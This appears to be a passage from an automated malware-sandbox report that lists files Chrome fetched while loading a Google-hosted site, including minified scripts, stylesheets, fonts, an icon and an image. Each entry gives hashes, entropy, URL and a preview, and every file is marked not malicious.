                                                                                                                    SHA-256:051BE6AC38731ACA733C1D11C2C103BBF8A173F4CACEDFF061115351C015F430
                                                                                                                    SHA-512:7F85893440A68B3BB4DCD9F5A76215AB8DFDC21DFE1594AFD82DE261678391C6FB481183D902274D38C00FFD17B398B1CD5BE0BE48BE8249BF3AB81EBBF9FE3B
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:"use strict";this.default_vw=this.default_vw||{};(function(_){var window=this;.try{.var YLa,ZLa,$La,gB,aMa,hB,cMa,dMa,bMa;YLa=function(a,c){return(a+17*c)%2174483647};ZLa=function(a,c){var e=a[_.nja];return e!==void 0?e:a[_.nja]=c(a)};$La=function(a){return a==="="||a==="."};gB=function(a){for(var c=1,e=a.length;$La(a[e-1]);)e--;for(var f=e-4,g=0;g<f;)c=a.charCodeAt(g)+31*c|0,c=a.charCodeAt(g+1)+31*c|0,c=a.charCodeAt(g+2)+31*c|0,c=a.charCodeAt(g+3)+31*c|0,g+=4;for(;g<e;)c=a.charCodeAt(g++)+31*c|0;return c};aMa=function(a){return gB(_.Dc(a))};.hB=function(a,c){c=c===void 0?0:c;for(var e={},f=0;f<a.length;e={HB:void 0},f++)if(e.HB=a[f],f===a.length-1&&_.vb(e.HB)){var g=[],h;for(h in e.HB){var l=+h;!Number.isNaN(l)&&g.push(l)}c=hB(g.map(function(m){return function(p){return m.HB[p]}}(e)),c)}else c=YLa(c,bMa(e.HB));return c};cMa=function(a){return hB(a.ca)};dMa=function(a){return hB([].concat(_.Ig(a.entries())))};.bMa=function(a){if(a==null)return 0;switch(typeof a){case "boolean":return g
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (1817)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):43641
                                                                                                                    Entropy (8bit):5.601106223240889
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:qgjicN0q3Ii7y8R2Pc/ZryZeWX7ieWnr5LDbzAuQosGdpKFAYp/kfDzZQp87J+LT:o42PEszQrJMo18mtfDNXi0s
                                                                                                                    MD5:01054A02B51F5F599A51D30081EF9ECB
                                                                                                                    SHA1:5E88096615EE2349ECA90A775DC925B1883B0BB1
                                                                                                                    SHA-256:051BE6AC38731ACA733C1D11C2C103BBF8A173F4CACEDFF061115351C015F430
                                                                                                                    SHA-512:7F85893440A68B3BB4DCD9F5A76215AB8DFDC21DFE1594AFD82DE261678391C6FB481183D902274D38C00FFD17B398B1CD5BE0BE48BE8249BF3AB81EBBF9FE3B
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    URL:"https://www.gstatic.com/_/atari/_/js/k=atari.vw.en_US.fw_mAcuwUyE.O/am=MBiA/d=0/rs=AGEqA5lwNXFYaHUUDGYHiMqlOO36DqQAOw/m=sy18,sy19,sy1b,sy1c,sy1e,fuVYe,sy1g,sy1h,sy1i,CG0Qwb"
                                                                                                                    Preview:"use strict";this.default_vw=this.default_vw||{};(function(_){var window=this;.try{.var YLa,ZLa,$La,gB,aMa,hB,cMa,dMa,bMa;YLa=function(a,c){return(a+17*c)%2174483647};ZLa=function(a,c){var e=a[_.nja];return e!==void 0?e:a[_.nja]=c(a)};$La=function(a){return a==="="||a==="."};gB=function(a){for(var c=1,e=a.length;$La(a[e-1]);)e--;for(var f=e-4,g=0;g<f;)c=a.charCodeAt(g)+31*c|0,c=a.charCodeAt(g+1)+31*c|0,c=a.charCodeAt(g+2)+31*c|0,c=a.charCodeAt(g+3)+31*c|0,g+=4;for(;g<e;)c=a.charCodeAt(g++)+31*c|0;return c};aMa=function(a){return gB(_.Dc(a))};.hB=function(a,c){c=c===void 0?0:c;for(var e={},f=0;f<a.length;e={HB:void 0},f++)if(e.HB=a[f],f===a.length-1&&_.vb(e.HB)){var g=[],h;for(h in e.HB){var l=+h;!Number.isNaN(l)&&g.push(l)}c=hB(g.map(function(m){return function(p){return m.HB[p]}}(e)),c)}else c=YLa(c,bMa(e.HB));return c};cMa=function(a){return hB(a.ca)};dMa=function(a){return hB([].concat(_.Ig(a.entries())))};.bMa=function(a){if(a==null)return 0;switch(typeof a){case "boolean":return g
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1150
                                                                                                                    Entropy (8bit):2.3710475547263856
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6:RlMRQ8W828W828W828W828S8eftXfc/lk:Ry3X3X3X3XjeVUk
                                                                                                                    MD5:EA69A3F95DD5484853D128186DB7E13D
                                                                                                                    SHA1:5FDB5FE05108FD6E5386BBDA06778AF4B446DC6A
                                                                                                                    SHA-256:8179E80BCFEF62154D1FF7371A1C60BD2C6C1E71C3DA2F4A8B1DB518A1900EC2
                                                                                                                    SHA-512:2169D31065059C3677D025F27A5650C1E35BF83B6D6B3D80842B0809FF67E85388CB00213A4BD3FA76F71909A21298C824B39299A3980BA3B11C0297DB472610
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:............ .h.......(....... ..... .....@....................P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>......................P>..P>..............P>..P>..P>..P>..P>..P>......................P>..P>..............P>..P>..P>..P>..P>..P>......................P>..P>..............P>..P>..P>..P>..P>..P>......................P>..P>..............P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..........................................P>..P>..P>..P>..P>..P>..........................................P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P>..P
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (1283)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):4470
                                                                                                                    Entropy (8bit):5.3814102326751785
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:wNriNfnwizwTA39aygEAz3sOCIWzTwlrJx:XVwTA35U3Bb
                                                                                                                    MD5:F29B73DEB7FD9236E7EEDA53DB230463
                                                                                                                    SHA1:496BD1C3E40265208EB207BD2E5ADBCD34D19CB4
                                                                                                                    SHA-256:CF173442A6A3374EE4A072A07D0758D1B7B1D292FE51426279FC9873B3FA77BC
                                                                                                                    SHA-512:96670C5B7BB97174204EF4839DB71AAC1E9B55953AF9D8F0DCB1F3B97F7D9B86CC21C69D8C5611E15F9D27F02DB0B3B1A0FFAA3DCF78D18250DF10D05332329E
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    URL:"https://www.gstatic.com/_/atari/_/js/k=atari.vw.en_US.fw_mAcuwUyE.O/am=MBiA/d=0/rs=AGEqA5lwNXFYaHUUDGYHiMqlOO36DqQAOw/m=sy14,YXyON,YV8yqd"
                                                                                                                    Preview:"use strict";this.default_vw=this.default_vw||{};(function(_){var window=this;.try{.var fLa;_.SA=function(a,c,e){return _.cla(document,arguments)};fLa=function(){var a=[];_.td(eLa,function(c,e){a.push(_.jl(e),":",c,";")});return a.join("")};_.TA=function(a,c,e,f){this.D=a;this.F=c;this.C=e||null;this.B=f?f:[];for(a=0;a<this.B.length;a=a+1|0)if(this.B[a].B.length>0)throw _.qra().Ob;};_.F(_.TA,_.or);_.TA.prototype.Sb=function(){return this.D};_.TA.prototype.getType=function(){return this.F};_.TA.prototype.nk=function(){return this.C};_.UA=function(){this.B=!1;this.V=!0};_.F(_.UA,_.xs);_.UA.prototype.isEnabled=function(){return this.V};_.UA.prototype.Ua=function(a){this.V=a};_.UA.prototype.BG=function(a,c){this.isEnabled()&&this.WO(a,c!=null?_.Or(c):0)};_.UA.prototype.speak=function(a,c){var e=this.BG;a=new _.TA(a,0,null,null);e.call(this,a,c)};var gLa={" ":"space","`":"backtick","~":"tilde","!":"exclamation mark","@":"at","#":"pound",$:"dollar","%":"percent","^":"caret","&":"ampersand","
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (1421)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):31069
                                                                                                                    Entropy (8bit):5.40644905813247
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:rlUZqboYsiXSMAxIies8kpMvPN67qvqemLAIxg7QVq+oHQby9O7LXdL8R2fpVNTj:nWVq+oHQby9O7LtVfzcql
                                                                                                                    MD5:601C47FBB1B95A6B20385B3724C704F1
                                                                                                                    SHA1:64C214CF4A7DAA9714965CC6C5E7CABDBAFC2EE5
                                                                                                                    SHA-256:3B473F00F9698E221AF711B717852C10213A5BB8FB7D63A97A53AD2113845442
                                                                                                                    SHA-512:57409165DF26FD3F6E1082098A6E38BE96853876AFA40C2748CA131480095A654B1E9962B96536432EFDFCAF7B846FA18BF6934E4191A524A572EC493E3215BF
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    URL:"https://www.gstatic.com/_/atari/_/js/k=atari.vw.en_US.fw_mAcuwUyE.O/am=MBiA/d=0/rs=AGEqA5lwNXFYaHUUDGYHiMqlOO36DqQAOw/m=sy3d,IZT63,vfuNJf,sy43,sy47,sy49,sy4k,sy4i,sy4j,siKnQd,sy1a,sy41,sy48,sy4a,sy3e,YNjGDd,sy4b,PrPYRd,iFQyKf,hc6Ubd,sy39,sy4l,SpsfSb,sy44,sy46,wR5FRb,pXdRYb,dIoSBb,zbML3c"
                                                                                                                    Preview:"use strict";this.default_vw=this.default_vw||{};(function(_){var window=this;.try{._.ZFb=function(a,c){c=c===void 0?window:c;c=c===void 0?window:c;return(c=c.WIZ_global_data)&&a in c?c[a]:null};.}catch(e){_._DumpException(e)}.try{._.x("IZT63");.var nWb=function(){var a=_.ZFb("nQyAE",window),c;if((c=_.ZFb("TSDtV",window))&&typeof c==="string"){var e=_.jj(_.lm(c,iWb),jWb,1,_.ej())[0];if(e){c={};e=_.jj(e,kWb,2,_.ej());e=_.r(e);for(var f=e.next();!f.done;f=e.next()){var g=f.value;f=_.K(g,7);switch(_.gj(g,p8)){case 3:c[f]=_.I(g,_.hj(g,p8,3));break;case 2:c[f]=_.xj(g,_.hj(g,p8,2));break;case 4:c[f]=_.mja(g,_.hj(g,p8,4));break;case 5:c[f]=_.K(g,_.hj(g,p8,5));break;case 8:switch(g=_.ij(g,lWb,_.hj(g,p8,8)),_.gj(g,mWb)){case 1:c[f]="%.@."+_.K(g,_.hj(g,.mWb,1)).substring(1)}}}}else c={}}else c={};if(c&&Object.keys(c).length>0)for(e=_.r(Object.keys(c)),f=e.next();!f.done;f=e.next())f=f.value,f in a||(a[f]=c[f]);return a},lWb=function(a){this.ca=_.w(a)};_.F(lWb,_.L);var mWb=[1];var kWb=function(a)
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):1337341
                                                                                                                    Entropy (8bit):5.683380762699244
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:91aXjGCzajTSMCd2mNCz4+24chUrno4QaNwXj+C6+vUn8sA:91MjGCzajTk
                                                                                                                    MD5:C717AC1FEE95216388DCF3A232A6D905
                                                                                                                    SHA1:15227DB61880671F224A947AF89484ACBFB0086C
                                                                                                                    SHA-256:74353691BD3623EC979870AF42A23AC3C96E38FED07A4D6A6551A2D58A1A4927
                                                                                                                    SHA-512:2B12CF3782FC4D11741F20D1BE807A2574A6F85FDB1B3A476ACCC3BB754AC16D469CC506D74534F168233F03E95584E16222149CCC0408B8E3EA395298066499
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    URL:https://www.gstatic.com/_/atari/_/ss/k=atari.vw.25xU_Jr9-_c.L.W.O/am=MBiA/d=1/rs=AGEqA5n10fXMAoH4jqEm2IA-nKhHo2AxQw
                                                                                                                    Preview:.VIpgJd-TzA9Ye-eEGnhe{position:relative;display:-moz-inline-box;display:inline-block}* html .VIpgJd-TzA9Ye-eEGnhe{display:inline}*:first-child+html .VIpgJd-TzA9Ye-eEGnhe{display:inline}/*! normalize.css v2.1.1 | MIT License | git.io/normalize */article,aside,details,figcaption,figure,footer,header,hgroup,main,nav,section,summary{display:block}audio,canvas,video{display:inline-block}audio:not([controls]){display:none;height:0}[hidden]{display:none}html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}a:focus{outline:thin dotted}a:active,a:hover{outline:0}h1{font-size:2em;margin:.67em 0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:bold}dfn{font-style:italic}hr{box-sizing:content-box;height:0}mark{background:#ff0;color:#000}code,kbd,pre,samp{font-family:monospace,serif;font-size:1em}pre{white-space:pre-wrap}q{quotes:"\201C" "\201D" "\2018" "\2019"}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-ali
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (1225)
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):92926
                                                                                                                    Entropy (8bit):5.612434461064469
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:tj0pP0oOzTuBXc2ZEw8b58rKnV+r2xt431sko/P:tNoOzTuhcXwqArCP
                                                                                                                    MD5:48F3855E9F0307D289CBC9C2313BD1D8
                                                                                                                    SHA1:7EDDAAF230FE48F519C7A7EEBDFD53443D2CBB5E
                                                                                                                    SHA-256:7A62263CC1E9A35BDBB728B683670B4CDD0F8C6CC955F5760F5BF60A51FFCFAF
                                                                                                                    SHA-512:C7317185815F511D88FE857AA7272B60F469308E3BDF4FC79BA0A492742BB4E85F36576ACE969031A013505539B5E2FA3E3C1879F6B657D0500EFB8BB3E599DB
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:"use strict";this.default_vw=this.default_vw||{};(function(_){var window=this;.try{._.x("NTMZac");.var D8=function(){_.Ll.call(this)};_.F(D8,_.Mn);D8.la=_.Mn.la;D8.prototype.Ml=function(){throw Error("ii");};D8.prototype.RF=function(){throw Error("ii");};D8.prototype.Nb=function(){throw Error("ii");};_.ko(_.Mta,D8);._.z();.}catch(e){_._DumpException(e)}.try{._.x("m9oV");._.P3=function(){_.Ll.call(this);this.enabled=!1};_.F(_.P3,_.Mn);_.P3.la=_.Mn.la;_.P3.prototype.Ua=function(a){this.enabled=a};_.P3.prototype.isEnabled=function(){return this.enabled};_.ko(_.eIa,_.P3);._.z();.}catch(e){_._DumpException(e)}.try{._.x("Ae65rd");.var AFb=_.qd("Ae65rd");var L1=function(a){_.Qn.call(this,a.Na);this.B=!1};_.F(L1,_.Qn);L1.la=_.Qn.la;_.k=L1.prototype;_.k.G3=function(){var a=this.S("haAclf").el();this.B=_.Im(a,"pointerEvents")==="none"};_.k.D3=function(a){var c=this.U(),e=this.S("haAclf").el();e=_.Im(e,"display")!=="none"&&a.targetElement.closest(".Znu9nd").el()===null;var f=this.B&&e&&!c.ab("CJI
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:PNG image data, 3396 x 1920, 8-bit/color RGB, non-interlaced
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):87859
                                                                                                                    Entropy (8bit):7.046777034066421
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:k4iIwz9HmGeKV5FrZuUDPA3Ae3ItuR30nAVO4P88D6s:piIkGZ+ZsJ4YR30ePHD6s
                                                                                                                    MD5:A4D9107960AE4E4F79E6A36DF931EF5D
                                                                                                                    SHA1:35704C698FCCD795B8F19DA76672A72C00422857
                                                                                                                    SHA-256:FBBBC78E85DFA4F2B390E6DC2F3850D0F5247D16B5FD525093331572AA79AE84
                                                                                                                    SHA-512:2C7FB7F198B0B141DD5B2B72ECB8B6E00514B70DFDE8CF6161988A5BB4F26C72BEED5CB59EC9E80BB2651016999D7DBB1CEE73F18AF7A982A0F3AC73E9B02465
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    URL:https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdrhY6zM7txEf61nPO67_Cl7rOyCGsyEb9GaIEqe3M-p-yN2nJeBUGCXkDygK7t8xYVcKwSgu4v0_u6EZF5srUh16p0vNl1K8hBeBV8dg-KcOpt7y8vrkamMOU2HxW0STp0JDEp21FWuCWxDXZX0EtxoLPSBWR6WwhXZglXIvWXbh24ojuyofD6htY8D4/s3396/userinter.png
                                                                                                                    Preview:.PNG........IHDR...D.........3;+.....sBIT.....O...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(..........Y..)....O..h.-... .IDATx...!.. ..0..X..I.................@g............;3............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13..
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (1953)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):38020
                                                                                                                    Entropy (8bit):5.63608450668924
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:KckTaQOQMB+JTl7vtnCQt2zWAaL7Lg3Qi16YxjqCW5InXPjwM:pQOTqTlVCQMzWl7MsWB
                                                                                                                    MD5:981999AE4E7A1B7534ED52AD7B437CA3
                                                                                                                    SHA1:5271CD98374EC3BF9FD8B09E6E53E1320D4B1B4C
                                                                                                                    SHA-256:24ECEB95A538E2CA25FECE065D4F518AC5AFDCF67F4550A3A962A635F2724A59
                                                                                                                    SHA-512:70273D218D62E78225FB77F500A1B3A68A63C96EED4DDAFE0536B9B71D27F4506BDDFB966840712323413F691DDC5638BFBC536D8B29A69BE3A3457C480D931A
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    URL:"https://www.gstatic.com/_/atari/_/js/k=atari.vw.en_US.fw_mAcuwUyE.O/am=MBiA/d=0/rs=AGEqA5lwNXFYaHUUDGYHiMqlOO36DqQAOw/m=sy1j,sy1l,sy1m,sy1k,FoQBg"
                                                                                                                    Preview:"use strict";this.default_vw=this.default_vw||{};(function(_){var window=this;.try{._.JOa=function(a){for(var c=[],e=0,f=0;f<a.length;f++){var g=a.charCodeAt(f);g<128?c[e++]=g:(g<2048?c[e++]=g>>6|192:((g&64512)==55296&&f+1<a.length&&(a.charCodeAt(f+1)&64512)==56320?(g=65536+((g&1023)<<10)+(a.charCodeAt(++f)&1023),c[e++]=g>>18|240,c[e++]=g>>12&63|128):c[e++]=g>>12|224,c[e++]=g>>6&63|128),c[e++]=g&63|128)}return c};_.fC=function(a,c,e){return _.Co(_.Ho(a,c),c,e)};_.gC=function(){this.blockSize=-1};.}catch(e){_._DumpException(e)}.try{.var hC,iC,KOa,LOa,OOa,POa,jC,VOa,WOa,XOa,YOa,mC,ZOa,aPa,bPa,oC;hC=function(a,c){this.F=a;this.H=c;this.B=!0};iC=function(a){var c={};a=a.replace(/\r/g,"").split("\n");for(var e=0;e<a.length;e++){var f=a[e],g=f.indexOf(":");g<0||(c[f.substring(0,g)]=f.substring(g+2,f.length))}return c};KOa=function(a){var c="";_.td(a,function(e,f){c+=f+": "+e+"\r\n"});return c};LOa=function(){};_.MOa=function(){var a=new _.Pr;_.ur(a);_.wr(a,Error(a));return a};._.NOa=function
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):4955
                                                                                                                    Entropy (8bit):5.3252243011550915
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:HYg1aipJc+u7Yg1aijNKYgEatJc+u7YgEafNKYgpaiKJc+u7YgpaigNKO1a+Jc+d:4niJ3nilOF3OBrii3rihuILM1C2MS
                                                                                                                    MD5:684F9458CC57E4E3D10A7371167FDD65
                                                                                                                    SHA1:A1416D4521EE15728690F1E69C38AC5D3BA0C0D5
                                                                                                                    SHA-256:809DF0321E4C22FB83008EFCA44B5F5E7AA10B7BB1CA6234A78D0795A7EC6EA8
                                                                                                                    SHA-512:0636A9500F3B9BB81CD365D75449E3DA36EBC8CAF5E8AAB9BB23F72FB40C8FE783A3DCB1EC12D532196AC4718394A07BAC53D897E98EE1B71D66DC1807BBF1A2
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    URL:https://fonts.googleapis.com/css?family=Lato%3A300%2C300italic%2C400%2C400italic%2C700%2C700italic&display=swap
                                                                                                                    Preview:/* latin-ext */.@font-face {. font-family: 'Lato';. font-style: italic;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/lato/v24/S6u_w4BMUTPHjxsI9w2_FQft1dw.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Lato';. font-style: italic;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/lato/v24/S6u_w4BMUTPHjxsI9w2_Gwft.woff2) format('woff2');. unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;.}./* latin-ext */.@font-face {. font-family: 'Lato';. font-style: italic;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/lato/v24/S6u8w
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):16
                                                                                                                    Entropy (8bit):3.875
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Hn8ohkYn:H8ohkY
                                                                                                                    MD5:900914BC560773CAF9E095A8F17F6E37
                                                                                                                    SHA1:51E0C4C0C0902C50F0D7E7581E0EDB0DCC191D7D
                                                                                                                    SHA-256:08E437A7674E58F221D4EE6D5742EF2643929FB566511709F988B5EBE4FE4C1E
                                                                                                                    SHA-512:2B48B170CEEBD6DB978D4DC79710A746903473B7C378FA25D6564AD6F6D2141A080E83C66D79688C35D3146F6DBFE996D3232C7A643F7767B8124C18065DB1C2
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAlDJtSIgVjqBRIFDb2Fgw8=?alt=proto
                                                                                                                    Preview:CgkKBw29hYMPGgA=
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 23236, version 1.0
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):23236
                                                                                                                    Entropy (8bit):7.986328239479246
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:AHLaTYDpoR9l+9cJHxkGk3kbFpW88POLvFd9EDtwntxiFyLs86d975a2sfbAh:AHLKSSD49c0SFQ1wFnCajiws86dJ59WK
                                                                                                                    MD5:716309AAB2BCA045F9627F63AD79D0BF
                                                                                                                    SHA1:38804233A29AAF975D557FE14E762C627BEF76E0
                                                                                                                    SHA-256:115F6A626CA115D4AD5581B59275327E0E860B30330A52B0F785561332DD2429
                                                                                                                    SHA-512:ADB0BC6CB9B230EDA5DAC7396A94A9A4DBA9C8BA0B2EB73F5F21A20C3CA3D14651420BC6A17E67A71B5BBA624F5A4E92D55CBBB898985DCCA838184F6DFB2B15
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    URL:https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh7USSwiPGQ.woff2
                                                                                                                    Preview:wOF2......Z........\..Z^..........................z.p.`..`..D....s...........B.....6.$..v. .....E.r........}Q.J..0..m..%h...1/<...J......z..........N&2\.K{iZ.....F$.AZ.!.=..a(...mv..t.6d..lH2..E}..j*2..oq..Q..B#..*........i.....\..%...0.Os..f.^;}..J....i..>]..w-...rN&#Y.N.9n.......[.=d...y..;...54..`7(.......!......b...$$..{._...|.;...7....0...Wlls..8.P.[.Ts.tu.T...c..*..F.g.;.....@.^/3......U0..Pu..;]......%.:...Z../..t..(..p..#..!!-...}.#..ET.Q5A._K.6...Q\.7,....8.E....R.ATPQ..(iI..60.Y....^....\.7}.z....c......Y}Y....1....(...y.!Z.,*...h...{.n....j....8.&..!....0'....m....7..L...rA...C..K....I..0.l8...A...."......'...........,M`.`.}..2.."<.MW[.....?..5..;.`.".d..dU..........V1..W.O.,.....r....+./.....z.m\..2...l ..6....... .+J..k..T%..4Uy..U.#.=....]'...f...R.u.Z......s.g.P+\....(....$...W....s'.{.R'...>..5f.R..9......&.`.A....b.Jexn.$..g.4.../.#.VR.B%.f+3&.qb.?...:.~........:Dg.5,...j.B..B.^-.......?.ig......(..O..~ ..\...T%:......P..M."..+.++_4...
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (2049)
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):14469
                                                                                                                    Entropy (8bit):5.472997784863054
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:IYim7O/sAg9U6KAQdkzFu+5aiWQLHO91cIuW:IoqUAh8vzLW2y
                                                                                                                    MD5:F447D1B8B0211DD89ABAF4E43D2D1FFE
                                                                                                                    SHA1:53B9C5F73A3F9E2C59293037469F3C69F317454F
                                                                                                                    SHA-256:AE2328B23CA6A7F6C2FDAAF7EC080B674AC1C95DA79378DAB2D15DFA3CBDF550
                                                                                                                    SHA-512:16DAB239929B5C02C0A34640237ED4E91C66F581A52B54B671D807EC894891C8F8FE3FCF1EB54C6EFA1EF0AE136B136B68855AEC931877A47CFFD3D4D663FE67
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:(function(){var aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ba=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");},ca=ba(this),g=function(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-.1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&aa(c,a,{configurable:!0,writable:!0,value:b})}},h=function(a,b,c){if(a==null)throw new TypeError("The 'this' value for String.prototype."+c+" must not be null or undefined");if(b instanceof RegExp)throw new TypeError("First argument to String.prototype."+c+" must not be a regular expression");return a+""};.g("String.prototype.endsWith",function(a){return a?a:function(b,c){var d=h(this
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):1150
                                                                                                                    Entropy (8bit):2.3710475547263856
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6:RlMRQ8W828W828W828W828S8eftXfc/lk:Ry3X3X3X3XjeVUk
                                                                                                                    MD5:EA69A3F95DD5484853D128186DB7E13D
                                                                                                                    SHA1:5FDB5FE05108FD6E5386BBDA06778AF4B446DC6A
                                                                                                                    SHA-256:8179E80BCFEF62154D1FF7371A1C60BD2C6C1E71C3DA2F4A8B1DB518A1900EC2
                                                                                                                    SHA-512:2169D31065059C3677D025F27A5650C1E35BF83B6D6B3D80842B0809FF67E85388CB00213A4BD3FA76F71909A21298C824B39299A3980BA3B11C0297DB472610
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    URL:https://ssl.gstatic.com/atari/images/public/favicon.ico
